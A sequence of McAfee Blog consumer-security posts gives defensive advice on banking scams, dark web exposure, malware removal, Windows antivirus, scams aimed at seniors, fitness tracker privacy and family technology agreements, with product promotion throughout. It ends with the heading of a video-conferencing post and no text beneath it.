If you log into your online bank account, your login information could be exposed, making you vulnerable to bank fraud. Shopping online with public Wi-Fi could also expose your credit card information. 

How to avoid online banking scams

Fortunately, you can protect yourself from cybercriminals with sensible precautions and a healthy dose of suspicion. Use the tips below to help safeguard your accounts from online banking scams. 

Secure your devices with McAfee

McAfee Total Protection provides all-in-one protection for your personal information and privacy. You’ll have coverage for all of your laptops, tablets, and smartphones on most operating systems — Windows, macOS, Android, or iOS. In addition to premium antivirus software, you get identity monitoring and a secure VPN that shields your data when using public Wi-Fi. 

Carefully assess any messages claiming to be your bank

You can better recognize phishing emails once you understand how banks communicate with customers. There are certain things legitimate banks never do. If you get a message like that, assume it’s fraudulent. Some other tips include: 

  • Calling: Banks or other financial institutions don’t call for your PIN or checking account number. Never provide this over the phone. Call your bank directly using the phone number on your credit card or bank statement if you want to confirm. 
  • Email: Your bank has no reason to email you for account information it already has. If you receive an email asking you to click a link or provide account information, assume it’s fraudulent. Don’t click any links and mark the email as spam. 
  • Text messages: If a message appears to be from your bank asking you to sign in or enter your PIN, it’s a scam. Banks never ask customers for this information by text. 
  • Urgent action: A common theme in phishing emails is the urgent call to action. Cybercriminals want to scare you into acting immediately without thinking. The email says there was suspicious activity on your account, and you should log in immediately to avoid having it frozen or closed. No legitimate business would close a customer’s account without giving reasonable notice. Contact your bank through your normal channels to check your balance and account activity if you aren’t sure. 
  • Typos: Misspelled words and grammatical errors are another red flag. Major corporations have professional editors to make sure the content is correct. 

Create strong passwords and update them regularly

At some point, almost everyone has used the same password for different websites. But this is one of the simplest ways for hackers to get into your accounts. If they figure out the password for one, they can sometimes access your other accounts.  

The most common passwords are:  

  • QWERTY 
  • Password  
  • 12345678 

Use unique passwords for each website. They should be 12 characters long and include numbers, lowercase letters, uppercase letters, and symbols. McAfee Total Protection includes a password manager to help generate and store your passwords in a single location. 

Always make sure you’re on the bank’s official website/app

If you get an email about an issue with your bank account, you can always go directly to your bank’s website. Don’t click any links in a text or email — just go directly to your bank’s website to check your account. Similarly, if you get a phone call, dial your bank directly using the official telephone number. 

Use two-factor authentication when logging into websites for your financial institutions. You’ll get a one-time code by text or email to use each time you log into your account. 

Be cautious of accessing your bank via public Wi-Fi

When you log onto public Wi-Fi, anyone can see your internet activity. For that reason, you shouldn’t log into your bank account with public Wi-Fi unless you’re using a virtual private network (VPN).  

McAfee Secure VPN protects your privacy by turning on automatically for unsecured networks. Your data is encrypted so it can’t be read by prying eyes. The VPN also keeps your online activity and physical location private and secure from advertisers. 

Check your bank statements regularly

Review your bank statements carefully each month to ensure there are no unauthorized transactions. Contact your bank immediately if you see any payments or withdrawals that you don’t recognize. 

See how McAfee keeps you and your data secure online 

Being vigilant and understanding how scammers work can help you avoid online banking scams. For an additional layer of security, use McAfee Total Protection. Our comprehensive cybersecurity services protect all of your devices with award-winning antivirus, a secure VPN for safe Wi-Fi connections, and advanced identity monitoring. There’s even a team of security experts available to assist you around the clock. 

With McAfee, you can bank online with ease knowing your personal data is secure. 

The post Types of Online Banking Scams and How to Avoid Them appeared first on McAfee Blog.

A Guide to Finding Out If Your Information Is on the Dark Web

By McAfee

It’s difficult to imagine what life was like before the internet. We log in daily to pay bills, shop, watch movies, and check out what friends and family are up to on social media. While the internet has made life easier, we may not consider how our online activities can make personal information — such as our Social Security numbers (SSNs) or bank account and credit card numbers — vulnerable to cybercriminals on the dark web.

Fortunately, you can find out if your information is on the dark web and keep tabs on your sensitive information with extensive dark web monitoring, offered through McAfee’s Identity Protection services 

This article explains what the dark web is, how to find out if personal details have reached the dark web, and how to protect your sensitive information 

What is the dark web?

Unlike the surface web we use for things like shopping and online banking, the dark web is part of the internet that’s not indexed by search engines. It can only be accessed with special web browsers. A few widely known networks include Tor, I2P, and Riffle.  

Cybercriminals can browse, sell, or trade on dark websites with confidence and complete anonymity. Because of its highly layered encryption system, hackers can communicate without giving away their location, IP address, or identity.  

How does data end up on the dark web?

Data can end up on the dark web in several ways, including through data breaches, using public Wi-Fi, visiting a nonsecure website, and leaving an offline paper trail.  

A cybercriminal may hack into company databases and take personal data, such as email account addresses, passwords, and phone numbers. And while we all love to work at our favorite coffee shop, using an unsecured Wi-Fi network can leave our personal information in public view.  

That’s why using a virtual private network (VPN) like McAfee Secure VPN, which comes with bank-grade encryption to scramble your data, can be a good idea. You’ll also only want to visit encrypted webpages when browsing online — keep an eye out for URLs beginning with HTTPS rather than HTTP. The “S” means added security for you. Lastly, shred paper containing your personal information or lock it away until you can.  

How to find out if your information is on the dark web 

With identity monitoring through McAfee Identity Protection, you’ll receive notifications if we find your personal information on the dark web. Our extensive monitoring service keeps tabs on up to 60 unique types of personal data and can notify you up to 10 months sooner than similar services. Plus, you get peace of mind with up to $1 million of ID theft coverage and hands-on restoration support to help reclaim your identity after identity theft 

Can you remove your information from the dark web?

While you can’t remove your information once it’s on the dark web, there are plenty of steps you can take to help protect yourself and prevent your data from falling into the wrong hands. You can: 

  • Notify the credit bureaus: The three major credit bureaus (Experian, Equifax, and TransUnion) offer options to prevent fraudulent credit requests. If you’re looking to protect your credit data, request an option like two-factor authentication on all credit pulls when notifying the bureaus of your concern. 
  • Change your account passwords: Keeping your password secure is crucial to the safety of your online data when it comes to things like online banking and email accounts. Stay away from personal names, dates, or obvious preferences when creating or updating your passwords and use a password manager like McAfee True Key, which auto-saves and enters your passwords.  
  • Review your credit report: Staying up to date with the changes reflected on your credit report can help you identify suspicious activity or fraud alerts. Unexpected drops in your credit can be a sign of potential illegal activity. 
  • Track credit card statement charges: Credit cards are a large target for hackers looking to commit a cybercrime. Thankfully, there are ways to keep your credit card data secure, starting with regular reviews of your statements to ensure no unexpected charges or usage.  
  • Scan your online devices for viruses: Keeping your device free of viruses can help prevent hackers from taking your information in the first place. Start by downloading antivirus software, like what’s included in McAfee Total Protection, to prevent opportunities for viruses to infect your device or collect your secure data.  

6 tips to prevent your data from getting on the dark web

No one wants their information to end up on the dark web. Fortunately, you can do a few things to minimize your risk of exposure. Here are some tips you can use to keep your data safe.  

Secure your data with identity protection software from McAfee

Identity protection software from McAfee can help keep your information out of the hands of cybercriminals. Some features of McAfee identity protection include expert security support, award-winning antivirus protection, a password manager, and firewall protection. Choose the plan that works best for you and keep tabs on your personal information.  

Sign up for two-factor authentication on your devices

This extra layer of security double-checks your identity when signing into an online account. You enter your password as usual and a unique six-digit, one-time code is sent to a trusted device via text. This added step can help improve the security of your personal information.  

Use a unique password for each account

When creating or updating your account passwords, make sure to choose ones that are difficult to guess. Avoid using a pet’s name, your name, or other personal information that others can guess. It goes without saying, but don’t share any of your passwords. 

Consider what you share on social media

Shared content can tell a lot about someone. Have you ever shared the make and model of your first car, your favorite movie or band, or your high school graduation year? This information helps unsavory characters figure out online passwords and security questions. 

Change permission settings for app 

There are a lot of cool apps out there, and many are harmless. However, some may request access to your location, photos, contact list, and even microphone. Certain apps, especially those filled with malware, can then collect your data and share it with others. Fortunately, Android devices and Apple iPhones allow you to change your permission settings for apps. 

Use caution with suspicious emails

With so many emails arriving in our inboxes, we may not always pay close attention to what we’re opening. However, scammers may use phishing emails in an attempt to access your personal information. Sometimes, these emails are obvious, but they can also look legit and appear as a trusted company, such as your bank or credit card company. If something seems amiss, such as a billing error or an invoice, log in through the company’s website rather than click links inside the email.  

Discover how McAfee Total Protection keeps you safe online

No one wants their information on the dark web. Thankfully, there are several things you can do to keep your personal information secure, including all-in-one protection from McAfee. 

McAfee Total Protection comes with advanced identity monitoring, which provides faster and broader detection for your identity, plus premium antivirus software, safe browsing, and Secure VPN 

With easy setup and extensive monitoring, you can maintain your digital identity and gain peace of mind.  

The post A Guide to Finding Out If Your Information Is on the Dark Web appeared first on McAfee Blog.

How to Quickly Remove Malware in 2022

By McAfee

If you’re like most people, you probably use your computer for most of your online activities. It’s amazing what the internet can do to make our lives easier. But if you’ve spent any time online, you know the internet also comes with some risks. 

Malware (or malicious software) is one risk of living a connected life. Whether it comes from infected websites, innocent-looking email attachments, or applications and tools you think you can trust, malware can expose your private information to cybercriminals who may use it for personal gain. 

If you suspect that malicious software has infected your device, it’s important to remove it quickly to protect yourself.  

Though dealing with malware can be scary, there are a few things you can do. This article will explain how malware can infect devices and how you can remove it from them. 

How devices become infected with malware

There are many types of malware, which do their work in different ways. They can include viruses, worms, Trojans, spyware, adware, ransomware, and more. 

Some common ways that Windows PCs, Macs, tablets, and smartphones can get infected include: 

  • Phishing and malspam emails: These are emails — often posing as trusted sources — that try to trick you into revealing sensitive information, such as your credit card number and passwords, to different services. 
  • Peer-to-peer sharing (P2P sharing) and torrents: P2P sharing and torrents often offer software, games, and media for illegal downloading. They can also contain downloads spiked with malicious software code. 
  • Spoofed websites of well-known brands and organizations: Cybercriminals might pose as websites of legitimate organizations to trick you into downloading malware. Click on a link, and the malware downloads to your hard drive. 
  • External storage devices, such as USB drives: USB drives and other external storage devices are a popular way to exchange files between computers. However, if you find or receive a USB drive from an unknown source, don’t plug it into your machine. 
  • Compromised software: Sometimes, malware can compromise the software you download. It’s a good idea to only download through trusted sources. 
  • Adware, including pop-up ads: Pop-up ads are a nuisance when you click on a webpage, but they can also be laced with malware that’s released when you click on them. 
  • Fake mobile apps: These often pose as popular apps, such as fitness tracking tools or cryptocurrency applications. Download them, and your mobile device can become compromised. It’s best only to download apps from trusted sources.  

How can malware affect you?

Malware can affect you in a variety of ways. For example, malware can allow hackers to steal your private information, uncover passwords, cause financial issues for you or your company, delete files, and render your device unusable.  

Malware can also move from your computer to other devices, so you may unwittingly infect friends, family, or co-workers. It can gobble up your computer’s memory, slow its operation to a snail’s pace, and more. 

For these reasons, it’s a good idea to find out how to remove malware and learn to protect yourself from it in the first place. 

Signs malware  is infecting your device

The Federal Trade Commission (FTC) Consumer Information points out some ways to know if malware has infected your device, including if it: 

  • Suddenly slows down, crashes, or displays repeated error messages 
  • Won’t shut down or restart 
  • Prevents you from removing software 
  • Starts serving up a lot of pop-up ads, inappropriate ads, or ads that interfere with page content 
  • Displays ads in places you wouldn’t usually see them, such as government websites 
  • Displays unexpected toolbars or icons in your web browser, such as Chrome or Safari  
  • Changes your default search engine or displays new tabs or websites you didn’t open 
  • Repeatedly changes your homepage 
  • Sends emails from your personal account that you didn’t write 
  • Runs out of battery life more quickly than normal 

Malware removal on your PC

How to remove malware from your devices

If you think your computer, smartphone or tablet has been infected by malware, the first step is to stop ​​shopping, banking, and doing other things online that involve usernames, passwords, or other sensitive information until you have the problem resolved. 

If you don’t have an antivirus program on your device, it’s a good idea to get one. McAfee’s antivirus software provides award-winning protection for your data and devices. It’s important to get antivirus software from a trusted name because some malware can even masquerade as security software. 

It’s also important to make sure that your operating system for your different devices and applications are up to date. Older programs and apps might not have the latest security features — cybercriminals are constantly devising new ways to get people’s information — and outdated software can have a harder time fighting off infection.  

Once your cybersecurity software is in place, you should: 

Scan your device for malware

If you have a PC with Windows 10 or 11, you already benefit from free virus threat protection with Microsoft Windows Defender. Windows Defender, or built-in Microsoft security, compares new files and programs against a database of known malware. It keeps an eye out for signs that an attack is underway, such as the encryption of key files.  

Defender can run in active, passive, and disabled mode. In active mode, it’s the primary antivirus app on the device. This means the program will scan files, remedy any threats, and show detected threats in your organization’s security reports and in the Windows Security app. 

Microsoft Defender will automatically turn off if you have another antivirus app installed and turned on. Microsoft Defender will turn back on automatically if you uninstall the other app. 

In passive mode, Microsoft Defender isn’t used as the primary antivirus app on the device. It’ll scan files and report any threats but it won’t remedy those threats. Finally, Microsoft Windows can’t detect or address threats if it is disabled or uninstalled. 

You can run quick and advanced scans in Windows Security. If you’re worried that a specific file or folder has been compromised, you can also run a manual scan by: 

  1. Right-clicking the file or folder in File Explorer 
  2. Selecting Scan with Microsoft Defender 

You’ll see the scan results and options for dealing with any potential threats. 

Microsoft Defender is also available to protect Android smartphones from viruses and malware. It can also help against phishing and phishing and scans your Android device automatically to track and identify potentially unwanted, and dangerous, applications on your device. 

Apple users, as well, have built-in antivirus software to help detect and fight off malware. Malware is commonly distributed across macOS systems by being embedded in a harmless-looking app 

Luckily, settings in Security & Privacy preferences allow you to designate the sources of software installed on your Mac. Just follow these steps: 

  1. Choose the Apple menu.  
  2. Select “System Preferences.” 
  3. Click “Security & Privacy.”  
  4. Click “General.” 
  5. If the lock at the bottom left is locked, click it to unlock the preferences pane. 
  6. Select the software sources from which you’ll allow software to be installed, including the Mac App Store and identified developers who are registered with Apple. 

Apple iPads and iPhones have strong built-in security and privacy protections, so it is up to the user on whether or not they want to install antivirus for additional malware protections. Apple boasts a “walled-garden” approach–meaning that their operating system is closed to outside apps and games not affiliated with their official app store unless you jailbreak the device.

Remember that while cybersecurity features built into devices are a great starting point, they’re not always comprehensive. That’s where antivirus software, like McAfee Total Protection, can help. It offers continuous protection against malware, viruses, phishing, ransomware, and other online threats. It also automatically updates so you don’t need to worry about manual upgrades.  

The security software also includes alerts before you connect to risky websites and offers one-click fixes to help you stay safe online. 

Quarantine or remove any viruses

Antivirus software like McAfee works to block malware from infecting your computer, smartphone, or tablet. If malware somehow does get through, it can act as a powerful malware scanner by searching every file on your device for infections.  

It can troubleshoot, look for vulnerabilities, and compile a list of infected software that can be quarantined (or isolated) to prevent it from doing harm and deleted at the end of the virus scan using removal tools 

McAfee’s anti-malware software updates its virus database by using an automatic web crawler that scans the internet, identifies online threats like malicious software, and figures out how to delete them. 

McAfee antivirus uses this data to automatically update your device’s protective set-upl, providing strong protection so nothing harmful gets in.  

Besides desktop computers, McAfee provides mobile security for both Android and Apple devices. For example, when you use your iPhone or Android phone on a public Wi-Fi system,  McAfee’s Wi-Fi privacy protection (VPN) in effect turns the public network into a private one, where you can surf safely. Of course, its antivirus app regularly scans for threats and malware while actively blocking them in real time, keeping your mobile devices protected. 

McAfee keeps your device secure

McAfee offers a variety of plans tailored to fit your needs and budget so your computer and other devices — including Android smartphones, Apple iPhones, and various tablets — are protected from malware and other online threats. 

McAfee is a leader in consumer security, and our antivirus software is used on more than 6 million devices. It’s easy to install and use, provides 24/7 real-time threat protection, and comes with a Virus Pledge — a money-back guarantee that it’ll remove all viruses from your protected devices. 

You can get antivirus software as part of McAfee’s Total Protection services. This includes all-in-one protection for your personal info and privacy, with identity restoration assistance and up to $1 million of identity theft coverage for data breaches. You also have access to identity monitoring, safe browsing, and a secure VPN.​ 

With McAfee, you can turn apprehension about malware into the peace of mind that comes from proper protection. 

The post How to Quickly Remove Malware in 2022 appeared first on McAfee Blog.

Does Windows 10 or 11 Need Antivirus Software?

By McAfee

If your PC runs on Windows 10, you’re in very good company. The Microsoft operating system is the most widely used OS in the world. Many Windows 10 users have also been upgraded to Windows 11 through a rollout that began in 2021. Microsoft plans to complete the Windows update by mid-2022.

Unfortunately, its success as a widely used operating system makes Windows attractive to hackers. And if malicious software like malware can make a home in Windows, there are a lot of targets. So, this might raise the question of how best to protect your Windows 10 or 11 device.  

 Should you just use Windows DefenderMicrosoft’s free version of antivirus software — or buy additional protection?  

Read on to learn what Microsoft Defender covers and how additional virus protection can secure all of your connected devices. 

Does Windows 10 come with antivirus software?

For years, Microsoft has offered anti-malware protection, but the current version provides effective security against viruses. Windows Defender is a free antivirus tool that’s built into the Windows operating system 

While it’s considered one of the best free antivirus software programs, it doesn’t have any extra features that might come with paid security software. If you’re just looking for good antivirus software, though, Windows Defender can get the job done.  

How to check if Windows Defender is on

If you’re not using third-party antivirus protection, you’ll want to make sure that your Windows Defender antivirus coverage is working on your computer. Here’s how to check: 

  1. Go to the control panel and click System and Security. 
  2. Click Windows Defender Firewall. 
  3. A window will open showing if the firewall is on. 
  4. If you need to turn on Windows Defender, use the menu. 
  5. Close all browser windows and restart your computer. 

To make sure your Windows security is running, follow these steps: 

  1. Click CTRL+Alt+Del and select Task Manager. 
  2. Look at the tabs and click Services. 
  3. Scroll down to Windows Defender and see if it is classified as “running.” 

Do you need additional antivirus software?

With built-in coverage, you may wonder if you should invest in paid antivirus software. The answer is, of course, yes! It can be a good idea to get another antivirus solution because blocking malware and viruses should just be one part of your threat protection 

Today’s cybercriminals are using elaborate ruses to try to access your personal information, such as your bank and credit card numbers. And some of their scams might even target your devices with risky apps or links on social media.  

As they always say, it’s better to be safe than sorry! Having another antivirus program can make sure you have real-time protection and access to the latest security features. 

4 features you want in an antivirus software

There are a lot of antivirus protection programs out there, but they aren’t all created equal. When looking for the best antivirus software for your needs, here are some things to consider for your devices running on Windows 10 or 11. 

Compatibility across multiple operating systems

If you have a Windows PC, use an iPhone, and your tablet runs on Chrome, it helps to have an antivirus app that works across multiple operating systems. The good news is that McAfee Total Protection is compatible with Windows, Mac, iOS, and Android devices, so you can continue enjoying all of your different devices without losing protection. 

Protection against a variety of online threats

For greater cybersecurity, antivirus software should defend against a variety of online threats like viruses, spyware, and ransomware. And that’s exactly what you get with McAfee Total Protection. Our antivirus software can also help you avoid phishing attacks, which are fake messages to trick you into providing information or clicking a malicious link. The software will give you a warning when it recognizes a risky link, website, or file. 

Easy to use

Functionality is another thing you’ll want to consider when looking for antivirus software. If the program isn’t easy to use to begin with — especially if you want to easily manage multiple devices — what good will it do you?  

But you don’t have to worry with McAfee Total Protection, which allows you to connect and manage all of your computers and mobile devices from one single dashboard. 

Real-time and scheduled scanning

To keep your devices free from online threats like malware, good antivirus software will scan your files for threats. McAfee Total Protection provides 24/7 protection with real-time, on-demand, and scheduled scanning of files and applications.  

Additional features beyond antivirus software

McAfee Total Protection was developed with an understanding of how cybercriminals operate. Scammers may use a variety of tactics to try to steal your personal information, so our all-in-one protection also includes:  

  1. VPN: A virtual private network (VPN) is one of the biggest benefits of using third-party antivirus protection. When you connect to public Wi-Fi, such as in a coffee shop, it’s possible for a hacker to see your data. A VPN encrypts your data to protect it from prying eyes. It also conceals your device’s IP address and geolocation. 
  2. Identity monitoring: Get 24/7 monitoring of your email addresses and bank accounts with up to $1 million of ID theft coverage with McAfee Total Protection. With early detection, an easy setup, and extensive monitoring (keeping tabs on up to 60 unique types of personal information), you can continue to live your best life online.  
  3. Protection score: We’ll look at the health of your online protection and give you a protection score. We’ll also recommend how to address weak spots and improve your security. 
  4. PC optimization: There’s nothing more frustrating than trying to work on a computer that loads pages slowly or keeps freezing. To help speed up your online activities, McAfee  PC Optimizer automatically pauses auto-play on pop-up videos. This gives you more bandwidth and saves battery power. The software also disposes of temporary files and cookies to free disk space. 
  5. Password manager: One good way to keep your data secure is to use strong passwords that are unique for each website. Our password manager generates complex passwords, stores them, and even lets you access shared passwords on your mobile devices. 

Personalized protection for your digital life

Using Microsoft’s built-in antivirus software can protect your Windows devices from viruses and malware. But to really keep your network and all of your devices secure, it’s good to rely on comprehensive protection like McAfee Total Protection. With services like identity monitoring, safe browsing, and a secure VPN, you can enjoy the internet without worry. 

The post Does Windows 10 or 11 Need Antivirus Software? appeared first on McAfee Blog.

Seniors: How to Keep Your Retirement Safe from Online Scams

By Toni Birdsong

The growing number of internet crimes targeting senior adults is mind-blowing.

In 2021, more than 92,000 people over the age of 60 reported losses of $1.7 billion, according to IC3, the FBI’s Internet Crime division. That number reflects a 74 percent increase in losses from 2020.  

These numbers tell us a few things. They tell us that scamming the elderly is a multi-billion-dollar business for cybercriminals. It also tells us that regardless of how shoddy or obvious online scams may appear to anyone outside the senior community, they are working. 

However, information is power. Senior adults can protect their hard-earned retirement funds and government benefits by staying informed, adopting new behaviors, and putting tools in place designed to stop scammers in their tracks. And, when possible, family, friends, and caregivers can help. 

The FBI said confidence fraud and romance scams netted over $281 million in losses.  

The top four types of scams targeting seniors: Romance scams (confidence scams), fake online shopping, false utility representatives, and government agent imposters. Here’s how to make a few shifts to mindset and your daily routine and steer clear of digital deception.   

5 Safeguards to Protect Your Retirement 

  1. Stop. Don’t share. Often phone or internet scams targeting seniors carry distinctive emotional triggers of elation (you won), fear (you owe), or empathy (please help). For instance, a phony source might urge: “You must send admin fees immediately to access your sweepstake winnings.” Or “You must provide your social security number to stop this agency penalty.” FBI and Better Business Bureau fraud experts advise senior adults to stop and think before taking any action. Be aware of common phishing scams that include legitimate-looking email messages from a bank, federal agency, or service provider requesting you “verify” personal information. The number one rule: Never give out any personal information such as a Social Security number, bank account numbers, Medicare numbers, birthdate, maiden names, work history, or your address. 
  2. Level up your security. Changing times call for new tools and new behaviors online. Consider adopting best practices such as installing McAfee security software, using strong passwords with Two-Factor Authentication (2FA), and knowing how to identify phishing and malware scams are fundamental components of digital literacy. For a deeper dive into cybersecurity best practices, read more.  
  3. Discuss new scams. Scammers rapidly adjust their tactics to current events such as the pandemic, tax season, or an economic crisis to emotionally bait senior adults. If you are a senior adult, check out weekly consumer alerts from IC3 or AARP to stay on top of the types of scams you may encounter. If you are a relative or caregiver to a senior adult, stay informed, discuss these scams with your loved one, and explore other ways to help
  4. Research all charities. Senior adults get daily calls, emails, or even Facebook messages trying to bilk them of their money. It’s essential to do your research. Before donating to a charity, you can consult Give.Org or Charity Navigator to verify the request is legitimate. 
  5. Report all scams and scam attempts. If you’ve been a victim of an online scam or even targeted unsuccessfully, report the incident immediately. Any consumer can report online scams at the FBI’s IC3 website. Credit, debit, or bank account fraud should be immediately reported to your bank.   

Just as the seasons change in our lives, so too must our behaviors when connecting to people and information via our devices. Cybercriminals target older people because they assume they aren’t as informed about schemes or technically savvy as younger people. Senior adults and their loved ones can work daily to change that narrative. With the right mindset, information, and tools, seniors can connect online with confidence and enjoy their golden years without worrying about digital deception.  

The post Seniors: How to Keep Your Retirement Safe from Online Scams appeared first on McAfee Blog.

Why You Should Care About Fitness Tracker Security

By McAfee

Congratulations! You reached 10,000 steps today!

It’s a great feeling when a wearable fitness device vibrates to let you know when you hit the day’s fitness goal. The digital fireworks display that lights up your watch’s screen is a signal that you should keep on moving to challenge yourself more … or spend the rest of the day on the couch guilt-free.  

While fitness wearable devices, trackers, and apps are excellent motivators for you, cybercriminals love them for their vulnerabilities and privacy loopholes. This doesn’t mean you have to chuck your expensive watch in the bin or delete your fitness apps from your smartphone. Awareness and smart habits go a long way in deterring cybercriminals. Keep reading to learn more about wearable technology vulnerabilities and how you can sidestep each. 

Location Data  

Many fitness tracker apps and wearables are equipped with GPS. At the end of a run or long walk, you can view your exact route, sometimes with detailed maps that show street and town names. This tracking feature was potentially dangerous back in 2018 when a fitness app released a heat map of all its users’ running routes for the year, which clearly outlined secret military bases.1  

Even if you’re stationed in a suburb and not hostile territory, you may consider the risks of sharing your location data. A determined criminal who has time to spare can guess your address and see the times of days when you’re commonly out at the gym or on a run.  

Personally Identifiable Information 

When you purchase a wearable fitness device, you often have to pair it with an accompanying smartphone app to see your daily stats and tailor your fitness goals. Think about all the personally identifiable information (PII) that app now houses: your full name, password, address, height, weight, location, medical concerns, daily activity patterns, etc. In the hands of a cybercriminal, this information can bring a nefarious actor one step closer to impersonating you. Plus, if your health data makes it onto the dark web or is sold to health companies, it may result in serious privacy concerns. 

Luckily, there are ways to get peace of mind about the security of your identity. Identity protection services, such as McAfee Identity Monitoring Service, provide expert identity theft support and up to $1 million in identity theft coverage. 

Tips to Improve Your Fitness Tracker Security 

Wearable devices complement any athleisure outfit and are a fun way to inspire athletic competition between a group of friends. Here are a few ways you can patch some of their security shortcomings: 

Change the factory password settings.

When you first purchase any new device, fitness trackers included, your first step should always be to reset the factory password. Cybercriminals know that many people often skip this step, making it easy for them to walk right into new accounts. If you have a hard time remembering your passwords, consider entrusting them to a password manager to remember them for you. McAfee True Key makes it so that you only have to remember one master password to unlock the rest, and it’s protected by one of the strongest encryption algorithms available. 

Make your account private.

This is a tip you should consider for all your social media accounts. When you post about your life online, you actually divulge a lot of personal details that are helpful to cybercriminals. In the case of fitness trackers and apps, sharing the times of day when you go to the gym, are at the local track, or are on a bike path may give a criminal an idea of windows during the day when your home is empty. It’s unsettling to think that strangers can track your whereabouts, so it’s best to keep those details exclusive to people you personally know and trust. 

Turn off geolocation.

In the case of fitness trackers and apps, a savvy cybercriminal may be able take an educated guess at your address, with which they can do a myriad of nefarious activities. Some running and fitness apps may be able to still create maps of your running routes but erase street names and other landmarks to make it more private. But when in doubt, turn off geolocation.  

Stay on Track 

Fitness trackers are a fun way to stir up some friendly competition, keep connected with your fit friends, and motivate yourself to exercise and maintain healthy habits. While you’re shopping for a new device or when evaluating your current tracker, keep these tips in mind to enjoy this technology to its fullest. 

The post Why You Should Care About Fitness Tracker Security appeared first on McAfee Blog.

Why You Need to Get a Family Technology Agreement Happening

By Alex Merton-McCann

There were multiple times during my digital parenting journey when I would have loved to put my head in the sand. Pretend that life was easy and that my kids weren’t going to grow up and want devices and to join social media. But I didn’t. I couldn’t. With four kids who had technology running through their veins, I had no choice but to embrace it. 

It’s All About Phones 

While many kids will first experience the internet from a family laptop or via their parent’s phone at a coffee shop (we’ve all done it), it’s when they get these devices into their hot little hands unsupervised a few years down the track that the real show starts. And that’s usually when they get access to a phone. Research from our eSafety Office shows that just under half of Aussie kids between 6 and 13 use a smartphone with about 1/3 owning their own device 

And while we can all wax lyrical about the good old days when we used payphones and how great it would be if our kids didn’t have smartphones, we need to keep it real. Technology is not going anywhere so the best thing we can to accept it’s here, educates our kids about how to use it safely and introduce boundaries and rules to ensure they are as safe as possible.  

So, without further ado, let me introduce you to the concept of a family technology contract – a great way to manage your kids and their tech use. 

What Is a Family Technology Contract?  

I like to think of a tech agreement as a clear outline of your expectations of your kids’ digital behavior – any behavior that occurs while using a device should be included in the agreement and yes, include TV here too! Now, before we progress, I have to share one key tip – don’t even think of putting together an agreement like this when tensions are high, or a heated argument is still in place – it will never work. Only talk about this or start working on it when you are in a calm and serene headspace.  

The most important thing is to have an agreement that is suitable for your kids’ ages and maturity and one that works for your family’s schedule. There’s no point making your 5-year-old sign an agreement that limits their time on Instagram when they’re probably quite happy visiting only the online sites that you have ‘bookmarked’ for them. And if your kids have a super busy schedule then you might want to include a rule that means there is no ‘leisure screen time’ (eg TV/movie viewing) till all homework is complete.  

How Old Do My Kids Need To Be? 

While it’s entirely based on your kids’ interests and tech usage, I think 3 is a good age to start with a basic agreement. That’s when they start understanding rules. And how old is too old for a tech contract, I hear you ask? Well, I acknowledge that introducing new rules and boundaries when your kids are well into their teens may be difficult however if things feel out of control and you are concerned about their mental health and less than ideal digital habits then it may also be exactly what you all need! 

What Should An Agreement Include? 

Keeping an agreement age-appropriate and relevant is essential. You may also want to keep it simple and focus on a few key things, such as: 

  • Be kind online always 
  • Never share passwords with your friends 
  • Always tell an adult if you see anything that upsets or scares you 

But it can include so much more. Here are some items you may choose to include in your own personalized version. Think of this list as a shopping list. Simply, pick & choose what works for the ages of your kids and your family’s structure. 

Time Limits/Device Usage 

  • I will ask permission before I use my device (younger children). 
  • I can use the internet/my devices/TV for __ hours a day after school. 
  • I can’t use my devices past __ pm in the evening. 
  • When I am not using my device, I will place it ___________.  
  • I will place my device in the family charging zone overnight. (This could be on the kitchen bench in a study, whatever works for your family) 

Responsibility 

  • I understand that any internet-enabled device (eg smartphone and laptop) can give me access to many things that may not be suitable for my age. I will use my devices safely and avoid clicking on any appropriate sites. (You could choose to list sites your kids can’t visit however this maybe, in fact, give them ideas! You choose what works best). 
  • I understand that it is my responsibility to protect my personal information and not share it freely online. This includes my name, family details, school, telephone numbers, and address. 
  • I will keep my password private and not share it with anyone outside my family. 
  • I understand that not everything is as it seems online and that being safe (and savvy) online means thinking critically and questioning whether it is true. 
  • I will not use a credit card online without permission from my parents. 
  • I will close down pop-up or banner ads and not click on them. 

Safety 

  • I will not share my location while using my devices.  
  • I will allow my parents to adjust the privacy settings on this device and monitor my activity. I understand that this is for my own safety. If older: I will ensure privacy settings are always on and set to the highest level for every social media platform I use. 
  • If anyone pressures me or makes me feel uncomfortable, I will stop talking to them and tell a family member or trusted adult.  
  • I understand that people are not always who they say they are online. 
  • I will not talk to anyone online who I don’t know in real life. 
  • I will not meet up with anyone I first met online without permission from my parents. 

Online Behaviour 

  • Being kind and respectful online is essential.  
  • I will only talk to people I know in real life when I am online (ideally, we’d want all our kids to agree to this but in reality, older teens won’t cop this. So, this is more suitable for younger kids) 
  • I will not be hurtful or mean to others on social media. This includes messaging, commenting, posting, liking, and sharing mean or hateful content.  
  • If I feel like I am being harassed or bullied online, I will tell a trusted adult.  
  • I will ask permission before I share pictures or videos of my friends. 
  • I will not share any content that is too revealing. This includes posting or sending inappropriate photos or messages. 

Smartphone Usage 

  • I will ensure my mobile phone stays in its protective case at all times. If it or the screen protector cracks or breaks, I will tell my parents.  
  • I will not use my phone when at school unless ___________________________. 
  • These places are no-phone zones:  
  1. Our family does not use our phones during dinner. 
  2. I will shut off my phone at __ pm and it will not be turned back on until ___ am. (You could also add here – after breakfast and/or until I am ready for school. 
  3. I will get permission from my parents before I download any apps on my smartphone – this includes games. 

Gaming 

  • I can play games that are rated: _____. (Ratings on games range from G, PG, M, MA15+ to R here in Australia). Please do your research here and work out what’s suitable for your kids. Check out the Australian Classification Board’s latest ratings for games to help make your decision. 
  • Video games that I am not allowed to play at my home, or anyone else’s home include: (list what games are off-limits) 
  • I will ensure my privacy settings are set to the highest level. 
  • I will not talk to people I don’t know in real life while gaming. 

Consequences 

I understand that access to my devices is a privilege and breaking this agreement will lead to the following consequences: (list what you feel is appropriate) 

Formalizing The Agreement 

I would have all parties sign and date the agreement: both parents and kids. You may choose to keep a copy on the fridge? Again, whatever works for your situation. 

So, if you are feeling like this digital parenting thing is getting the better of you, please consider introducing an agreement. For decades, parenting experts have written about the virtues of establishing clear boundaries for our kids and in my opinion, a tailored family tech agreement absolutely does that! 

Good luck!! 

Alex x  

The post Why You Need to Get a Family Technology Agreement Happening appeared first on McAfee Blog.

How Secure Is Video Conferencing?

By McAfee

